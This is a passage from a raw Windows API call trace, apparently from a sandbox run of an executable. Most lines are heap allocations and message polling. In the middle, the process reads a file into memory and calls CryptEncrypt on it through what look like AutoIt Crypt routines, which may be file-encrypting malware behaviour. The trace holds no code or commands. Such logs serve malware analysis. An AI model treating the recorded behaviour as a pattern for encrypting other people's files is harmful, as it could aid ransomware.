wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0254.009] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0254.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0254.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0254.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0254.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0254.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0254.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0254.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0254.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0254.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0254.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0254.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0254.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0254.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0254.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0254.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe50020 [0254.012] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0254.013] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0254.022] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x3182, lpOverlapped=0x0) returned 1 [0254.022] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0254.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0254.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0254.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0254.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0254.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13182) returned 0x2f14010 [0254.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe50020 | out: hHeap=0x970000) returned 1 [0254.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0254.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0254.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0254.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0254.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0254.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0254.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0254.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0254.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13182) returned 0x2f271a0 [0254.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0254.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0254.029] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0254.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0254.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0254.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0254.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0254.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13182) returned 0x2f14010 [0254.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0254.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0254.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0254.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0254.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0254.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0254.030] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0254.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0254.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0254.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0254.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0254.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0254.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0254.030] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0254.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0254.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0254.030] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0254.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0254.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0254.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0254.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e58 [0254.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0254.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0254.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0254.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0254.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13182) returned 0x2f14010 [0254.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0254.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d58 [0254.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0254.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0254.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0254.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e08 [0254.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0254.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0254.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0254.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e28 [0254.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0254.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0254.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0254.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51370 [0254.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0254.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0254.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0254.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0254.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0254.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13182) returned 0x2f3a330 [0254.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0254.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0254.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0254.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0254.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0254.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0254.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0254.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0254.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0254.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0254.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0254.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0254.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0254.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0254.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.036] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0254.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0254.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0254.036] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0254.036] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0254.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0254.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0254.036] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0254.037] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0254.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0254.037] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0254.037] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0254.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0254.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0254.037] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0254.037] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0254.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0254.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0254.037] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0254.037] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.037] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.037] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0254.037] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.038] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0254.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0254.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0254.038] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0254.110] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0254.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51a78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0254.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0254.111] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0254.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0254.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0254.111] CryptEncrypt (in: hKey=0xa876d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x13182, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x13188) returned 1 [0254.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0254.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0254.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0254.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0254.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0254.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0254.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0254.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0254.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0254.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0254.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0254.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0254.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0254.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0254.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0254.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0254.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0254.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0254.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0254.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0254.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0254.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0254.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0254.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0254.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0254.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0254.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0254.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0254.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0254.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0254.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0254.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0254.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0254.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0254.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0254.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0254.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0254.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0254.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0254.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0254.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0254.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0254.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0254.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0254.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0254.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0254.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0254.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0254.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0254.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0254.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0254.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0254.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0254.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0254.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0254.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0254.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0254.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0254.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0254.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0254.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0254.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0254.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0254.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0254.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0254.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0254.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0254.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0254.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0254.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0254.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0254.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0254.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0254.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0254.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: 